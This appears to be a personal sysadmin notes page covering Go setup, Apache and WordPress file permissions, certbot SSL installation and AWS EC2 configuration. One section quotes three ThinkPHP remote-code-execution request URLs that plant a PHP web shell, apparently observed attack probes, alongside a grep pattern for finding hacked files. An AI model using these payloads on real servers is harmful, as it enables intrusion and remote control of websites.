source ~/.bashsrc
Go (golang programming language)
Install Golang with Homebrew:
$ brew update
It takes a while to pull all the latest ... be patient ...
$ brew install golang
Go environment
$ vi .bashrc
Then add those lines to export the required variables
This is actually your .bashrc file
export GOPATH=$HOME/go-workspace # don't forget to change your path correctly!
export GOROOT=/usr/local/opt/go/libexec
export PATH=$PATH:$GOPATH/bin
export PATH=$PATH:$GOROOT/bin
Create your workspace:
Create the workspace directories tree:
$ mkdir -p $GOPATH $GOPATH/src $GOPATH/pkg $GOPATH/bin
$GOPATH/src : Where your Go projects / programs are located
$GOPATH/pkg : contains every package objects
$GOPATH/bin : The compiled binaries home
source ~/.bashsrc
Format your Go code
Go has a tool that automatically formats Go source code.
$ gofmt -w yourcode.go
OR
$ go fmt path/to/your/package
Go version
When installed, try to run go version
to see the installed version of Go.
davidr$ go version
go version go1.13.4 darwin/amd64
How to test SSL compliance ?
https://www.ssllabs.com/ssltest/analyze.html?d=david.raleche.com&latest
WordPress Hacker Technics Injection
https://xxxxxx.com/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=atpko.php&vars[1][]=<?php mb_ereg_replace('.',@$_REQUEST[_], '', 'e');
https://xxxxxxxx.com/?s=index/\think\template\driver\file/write&cacheFile=kolsk.php&content=<?php mb_ereg_replace('.',@$_REQUEST[_], '', 'e');
https://xxxxxx.com/?s=index/\think\template\driver\file/write&cacheFile=kolsk.php&content=
yum install perl-CPAN.noarch cpan install URI
Or
sudo yum install perl-libwww-perl yum install perl-XML-SAX.noarch
No you are ready to go !
Apache User
chown -R apache:apache .
Files
find . -type f -print0 | xargs -0 chmod 0400
Directory
find . -type d -print0 | xargs -0 chmod 0500
writable for storage and cache folder
chmod -R 700 storage/
chmod -R ug+rwx storage bootstrap/cache/
Files
find . -type f -print0 | xargs -0 chmod 0400
Directory
find . -type d -print0 | xargs -0 chmod 0500
Files Permission – Unix Server
- Folders – 755
- Files – 644
- wp-config.php – 600
- .htaccess – 644, or 600
Unix command for directories 755
find . -type d -print0 | xargs -0 chmod 0755 sudo find . -type d -print0 | sudo xargs -0 chmod 0755
Unix command for files 644
find . -type f -print0 | xargs -0 chmod 0644 sudo find . -type f -print0 | sudo xargs -0 chmod 0644
Find hacked files
grep -r --include=*.php -e '[[:alnum:]\/\+]\{137,\}'
Refer to
https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/CHAP_Tutorials.WebServerDB.CreateWebServer.html
Free SSL – Let’s encrypt
https://certbot.eff.org/lets-encrypt/debianjessie-apache
SSL INSTALLATION
wget https://dl.eff.org/certbot-auto sudo mv certbot-auto /usr/local/bin/certbot-auto sudo chown root /usr/local/bin/certbot-auto chmod 0755 /usr/local/bin/certbot-auto sudo /usr/local/bin/certbot-auto --apache
(1) modify –> /etc/httpd/conf.d/ssl.conf
(2) make sure you close http via aws inbount and ACL
THE SSL COMMAND
sudo /usr/local/bin/certbot-auto --apache
Activate htaccess
<Directory /var/www/xxxx>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Require all granted
</Directory>
Proper Directory and file permission
Directories 775
Files 664
Unix command for directories 755
find . -type d -print0 | xargs -0 chmod 0755
sudo find . -type d -print0 | sudo xargs -0 chmod 0755
Unix command for files 644
find . -type f -print0 | xargs -0 chmod 0644
sudo find . -type f -print0 | sudo xargs -0 chmod 0644
Unix User Apache
sudo chown -R apache:apache .
Find hacked files
grep -r --include=*.php -e '[[:alnum:]\/\+]\{137,\}'
Create instance ec2 with ssh access
(1) create ec2 instance
(2) create vpc Make usre to have public IPV4 dns
Get your VPC ID from your EC2 dashboard.
Go to VPC dashboard. Select your VPC with VPC ID.
Click on Actions and Select "Edit DNS Hostnames".
Select Yes and click Save.
Now you can find Public DNS IPv4 value in EC2 dashboard.
(3) create subnet – 172.30.3.0/24 250 available ip addresses make sure auto-assign IPV 4
(4) create internet gateway
(5) create route tables – ADD 0.0.0.0/0 to internet gateway
Install without verification
yum update -y
apache web server
<VirtualHost *:80>
DocumentRoot "/www/docs/host.example.com"
ServerName ec2-3-88-63-157.compute-1.amazonaws.comm
ErrorLog "logs/host.example.com-error_log"
TransferLog "logs/host.example.com-access_log"
</VirtualHost>
SSL
wget https://dl.eff.org/certbot-auto
[email protected]:~$ wget https://dl.eff.org/certbot-auto
[email protected]:~$ sudo mv certbot-auto /usr/local/bin/certbot-auto
[email protected]:~$ sudo chown root /usr/local/bin/certbot-auto
[email protected]:~$ chmod 0755 /usr/local/bin/certbot-auto
[email protected]:~$ /usr/local/bin/certbot-auto --help
/usr/local/bin/certbot-auto --debug --apache certonly -d raleche.com
Install new php package
sudo amazon-linux-extras install -y lamp-mariadb10.2-php7.2 php7.2
sudo amazon-linux-extras enable php7.3
sudo yum -y install php-cli php-pdo php-fpm php-json php-mysqlnd
Start the Apache web server.
[ec2-user ~]$ sudo systemctl start httpd
Use the systemctl command to configure the Apache web server to start at each system boot.
[ec2-user ~]$ sudo systemctl enable httpd
You can verify that httpd is on by running the following command:
[ec2-user ~]$ sudo systemctl is-enabled httpd
To ensure that all of your software packages are up to date, perform a quick software update on your instance. This process may take a few minutes, but it is important to make sure that you have the latest security updates and bug fixes.
The -y option installs the updates without asking for confirmation. If you would like to examine the updates before installing, you can omit this option.
[ec2-user ~]
$ sudo yum update -y Install the lamp-mariadb10.2-php7.2 and php7.2 Amazon Linux Extras repositories to get the latest versions of the LAMP MariaDB and PHP packages for Amazon Linux 2.
[ec2-user ~]
$ sudo amazon-linux-extras install -y lamp-mariadb10.2-php7.2 p
Many years ago, I was warned about AWS EC2 internal security breaches … Newly created ec2 instances are being used as proxies and so on on ipv4 and ipv6 ports
The worst situation is having AWS customer support denying the sabotages. AWS = Heaven for hackers = nightmares for newbies in network security